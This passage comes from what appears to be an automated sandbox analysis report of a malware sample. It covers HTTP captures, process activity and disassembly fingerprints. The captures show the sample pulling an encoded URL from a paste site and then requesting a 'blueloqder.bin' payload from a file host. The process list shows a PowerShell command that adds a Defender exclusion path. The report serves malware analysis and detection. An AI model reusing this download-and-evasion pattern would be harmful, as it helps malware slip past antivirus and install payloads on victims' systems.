                                                        2023-12-08 13:36:02 UTC807INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 36 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 69 64 38 38 74 66 6d 6c 38 36 66 67 6f 6c 68 72 6e 35 63 6a 73 38 6e 61 67 76 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54
                                                        Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:36:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=id88tfml86fgolhrn5cjs8nagv; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
                                                        2023-12-08 13:36:02 UTC48INData Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75
                                                        Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.7497065.253.86.154437544C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:36:03 UTC77OUTGET /tqJAc/blueloqder.bin HTTP/1.1
                                                        Host: oshi.at
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:36:04 UTC158INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 36 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                        Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:36:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                                                        2023-12-08 13:36:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.749708104.21.70.2404437964C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:36:10 UTC74OUTGET /raw/015dbe46ef97 HTTP/1.1
                                                        Host: paste.fo
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:36:10 UTC809INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 36 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6a 34 63 66 38 6b 74 74 61 33 72 73 6b 32 32 6e 6b 67 6b 32 63 64 63 34 32 75 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54
                                                        Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:36:10 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=j4cf8ktta3rsk22nkgk2cdc42u; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
                                                        2023-12-08 13:36:10 UTC48INData Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75
                                                        Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.7497105.253.86.154437964C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:36:11 UTC77OUTGET /tqJAc/blueloqder.bin HTTP/1.1
                                                        Host: oshi.at
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:36:12 UTC158INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 36 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                        Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:36:12 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                                                        2023-12-08 13:36:12 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:14:35:50
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Imagebase:0x6c0000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:14:35:51
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:14:35:51
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:14:35:54
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\9K25QyJ4hA.exe"
                                                        Imagebase:0x2a0000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:14:36:04
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:24
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\9K25QyJ4hA.exe"
                                                        Imagebase:0x920000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:25
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:32
                                                        Start time:14:36:12
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 029815E0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: piAq
                                                          • API String ID: 0-3273502913
                                                          • Opcode ID: 94c9837211aee94e45cf514690a0c8bc62ed2ce98ebedb98dd3b4ab05d1084d4
                                                          • Instruction ID: bf8e3cae2ad6f17dd24e7008a39c0b00f316460c4a43c0f2f58b002a8e0c0dad
                                                          • Opcode Fuzzy Hash: 94c9837211aee94e45cf514690a0c8bc62ed2ce98ebedb98dd3b4ab05d1084d4
                                                          • Instruction Fuzzy Hash: D5C1EE74E01209CFDB14DFA9C484ADDFBB6BF49304F14866AD819AB365DB30A946CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02980870 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: ac629262736c87997b90c6ef7dad8468b20906a205ddacecea7d57607784d753
                                                          • Instruction ID: 1975c00254709e1f1074f75d7f84e2f4208bd27c278ebae2c07e05af27cd1ecb
                                                          • Opcode Fuzzy Hash: ac629262736c87997b90c6ef7dad8468b20906a205ddacecea7d57607784d753
                                                          • Instruction Fuzzy Hash: 70B1B574E00218CFDB18DFA9D894A9DBBB2FF89300F148569D419AB395DB34AD46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02980880 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: 090f821081c7347125b7abd5c31fe1fe6e2a734af6259a15e5434995e4ef86f4
                                                          • Instruction ID: 9471f6ef7418e9e9960d410782c19fefee3a527d5f1742515324233fa5a95aeb
                                                          • Opcode Fuzzy Hash: 090f821081c7347125b7abd5c31fe1fe6e2a734af6259a15e5434995e4ef86f4
                                                          • Instruction Fuzzy Hash: 32B1B478E00218CFDB58DFA9D894A9DBBB2FF89300F108569D419AB395DB34AD46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981230 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0aaf62b9cb78bed3a38b8317adb2cc47cf8fd4f7dfb33ab4cdd695892d48b374
                                                          • Instruction ID: b4e24fbc5b47a730fe778f9c8c78794dff375b5e87e07b3289b5d281495422f8
                                                          • Opcode Fuzzy Hash: 0aaf62b9cb78bed3a38b8317adb2cc47cf8fd4f7dfb33ab4cdd695892d48b374
                                                          • Instruction Fuzzy Hash: 3E916D78E022089FCB04DFA9D58499DFBF6BF88310B258665E809AB365D730EE45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02982DB4 Relevance: .1, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d2a0c6a726678a32b2d924148d954f41f00bc92f94cbb6b6906fe59e73d0134
                                                          • Instruction ID: b92ebfb777377808a2b968a52d14b1ad8611a11dc7ff9d63c4d0ae759cf03aab
                                                          • Opcode Fuzzy Hash: 7d2a0c6a726678a32b2d924148d954f41f00bc92f94cbb6b6906fe59e73d0134
                                                          • Instruction Fuzzy Hash: 11117075D042488BDB29DF64D8557EEBBB2BB4A310F18502AD801B3391CB704844CB68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 029815D2 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de28fe69b177cc7cb82d2ae2868eca90784ef8c3b3f1ad6ec3537f356818b4a7
                                                          • Instruction ID: 0b520d6a013757cb64dc82c366fd50157e3e54ead05f1a8d5063296b91d14362
                                                          • Opcode Fuzzy Hash: de28fe69b177cc7cb82d2ae2868eca90784ef8c3b3f1ad6ec3537f356818b4a7
                                                          • Instruction Fuzzy Hash: D2512434E00219CFDB14DFA8C484AEDBBB6FF49304F1886AAC459BB255DB30A946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02982105 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c49217639d2b659bc72f6b760354064851607772232a17922b11f6b80489cffd
                                                          • Instruction ID: cebfe474f57c713abdc193500077e44e280411a513264f69e9369341e25f223d
                                                          • Opcode Fuzzy Hash: c49217639d2b659bc72f6b760354064851607772232a17922b11f6b80489cffd
                                                          • Instruction Fuzzy Hash: 6B311870D012489FDB24DFA9C580AEEBFF5BF48300F288419E919AB350DB759945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981E70 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 349fd51c70a8985132e2bf03b0f21213d637b9bc48e535229e043749b935eab5
                                                          • Instruction ID: 21e47cb0ba8378dcdaacc35885f10f1e8a63102d37d8d664e39610509af9d394
                                                          • Opcode Fuzzy Hash: 349fd51c70a8985132e2bf03b0f21213d637b9bc48e535229e043749b935eab5
                                                          • Instruction Fuzzy Hash: 88318F35B001449FDB14DB79C490A9EFBF6EF88350B18816AE48ADB315DB30ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02982110 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1291522dbc5e4f16711ba30bee30fa9668e0eea3f955a76b5c240b9bcdc163bd
                                                          • Instruction ID: 0851b1833b943dfeb65ef78fbdfa863efdcc0181eacc98ffd12f0211e3c15bbd
                                                          • Opcode Fuzzy Hash: 1291522dbc5e4f16711ba30bee30fa9668e0eea3f955a76b5c240b9bcdc163bd
                                                          • Instruction Fuzzy Hash: 7A311770D012489FDB24DFA9C580AEEBFF5BF48310F288429E919AB350DB759945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981220 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b9233a1a8f49e1dd899e44995231f226496e4a596172731f96a293e72fc9be3
                                                          • Instruction ID: c63b080f47232e801513862088c4e9810e0daf276ef15dba0e2630ffe3f553a5
                                                          • Opcode Fuzzy Hash: 7b9233a1a8f49e1dd899e44995231f226496e4a596172731f96a293e72fc9be3
                                                          • Instruction Fuzzy Hash: D331F275E012489FDB05DFA8D484ADDBBF6EF89300F14856AE405AB315DB30A946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD6DC Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7218af7ce5568fc57632b5348bf9904479d86096728ad1a748bcd6746219767b
                                                          • Instruction ID: 27614f06e2ca5bbf359668f4e8b30eebab0702f500a1dd3f9ae0ab9313947763
                                                          • Opcode Fuzzy Hash: 7218af7ce5568fc57632b5348bf9904479d86096728ad1a748bcd6746219767b
                                                          • Instruction Fuzzy Hash: 2421287D504304DFEB08DF10D9D0B16BF66FB98324F20C169E8098B656C736D456CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD5F0 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd7f6175ffc5c827e6f3db9ffdbb08513e984b758dbb0c99650c582a1715bd28
                                                          • Instruction ID: 704805791b06bb199fda9e5248b5d507b02d3a86815807b1caff1d6b3671feba
                                                          • Opcode Fuzzy Hash: fd7f6175ffc5c827e6f3db9ffdbb08513e984b758dbb0c99650c582a1715bd28
                                                          • Instruction Fuzzy Hash: 662121BD504204DFEB14DF18D9D0B26BB61FB88324F208569E80D8A657C736D846CAE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 029814BF Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcc2f7da8603d9f06b5a1be058c26c00246bab5a5201fceaa3216ee8d9ba7fce
                                                          • Instruction ID: 549cb650b226da9dc6d30c14615a6dac3d6fcabbd3e6819c4e87f6bf0c8ac395
                                                          • Opcode Fuzzy Hash: fcc2f7da8603d9f06b5a1be058c26c00246bab5a5201fceaa3216ee8d9ba7fce
                                                          • Instruction Fuzzy Hash: 64213775E0025A9FCF06DBA8C4509DDBBB5EF49310B008299D955BB295D730A906CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0298111A Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
